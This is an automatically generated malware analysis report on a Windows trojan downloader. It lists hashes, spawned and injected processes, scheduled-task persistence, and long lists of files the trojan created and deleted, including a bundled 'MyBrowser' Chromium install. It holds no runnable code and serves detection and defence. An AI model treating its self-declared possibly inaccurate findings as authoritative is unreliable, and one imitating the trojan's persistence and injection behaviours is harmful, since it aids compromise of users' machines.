Trojan-Downloader.Win32.Genome.sxuj (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f90f8d317708fadfed5349db278545ea
SHA1: 3cdeb2369fd132d5b653026003bd0c09970a5591
SHA256: 121f71089682c237aa66943e4f19104c52d4113558ea01073995fdd20bf13d34
SSDeep: 6144:5zffoUzv5wCyfy4Uq9qFJ22uKjJqmoLosIo9jas/Q3NuBuV27xeWhPAG1RJ2TcFT:GUreCM9mJ2254to6aAQ3oB027F5oTneZ
Size: 274102 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsq18.tmp:1164
6471.exe:1916
chrome.exe:2304
chrome.exe:2268
chrome.exe:2216
chrome.exe:1980
chrome.exe:2252
nsq21.tmp:168
nso13.tmp:508
6481.exe:1988
tmp25.tmp:3448
setup.exe:576
setup.exe:240
tmp24.tmp.exe:1492
nsj1B.tmp:1648
dwwin.exe:2404
nsu5.tmp:468
nssF.tmp:1668
%original file name%.exe:1364
FlashPlayerUpdateService.exe:3536
The Trojan injects its code into the following process(es):
avg23.exe:1836
adv_128.exe:1660
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsq18.tmp:1164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6471.exe (14988 bytes)
The process 6471.exe:1916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].002 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\etsy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\search.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\chrome.packed.7z (1304956 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_finance.ico (2993 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gmail.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\target.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\9gag.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\priceline.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail.ru.ico (1909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (0 bytes)
%WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E (0 bytes)
The process chrome.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\30.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KyoUMYnZgcIULmW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\27.tmp (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons (4342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2C.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\2D.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\LOG (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\README (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_yOentjedkNlWMUS (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\32.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Visited Links (284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\31.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\26.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History (21181 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_r6aGBN8ReJ2GMKt (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_2 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites-journal (12948 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data (22997 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_1 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_0 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_3 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History-journal (4756 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\28.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data-journal (1580 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\29.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_sUlVw20TbJznEkx (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\First Run (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7db7_appcompat.txt (13516 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites (5232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2F.tmp (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8d55a.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa48ef.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF998e8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF92399.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF8fc79.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9e728.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF94ab9.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RFa21cf.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Preferences~RF9bff8.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Local State~RF98531.TMP (0 bytes)
The process nsq21.tmp:168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\avg23.exe (43108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe (162513 bytes)
The process nso13.tmp:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf16.tmp (5641 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp15.tmp (0 bytes)
The process tmp25.tmp:3448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\Macromed\Flash\FlashInstall.log (2 bytes)
%System%\FlashPlayerApp.exe (3851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (1779 bytes)
%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll (121304 bytes)
%System%\Macromed\Flash\manifest.json (2 bytes)
%System%\Macromed\Flash\pepper.vch (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (7386 bytes)
%System%\Macromed\Flash\FlashPlayerUpdateService.exe (268 bytes)
%System%\FlashPlayerCPLApp.cpl (142 bytes)
%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3} (0 bytes)
The process setup.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
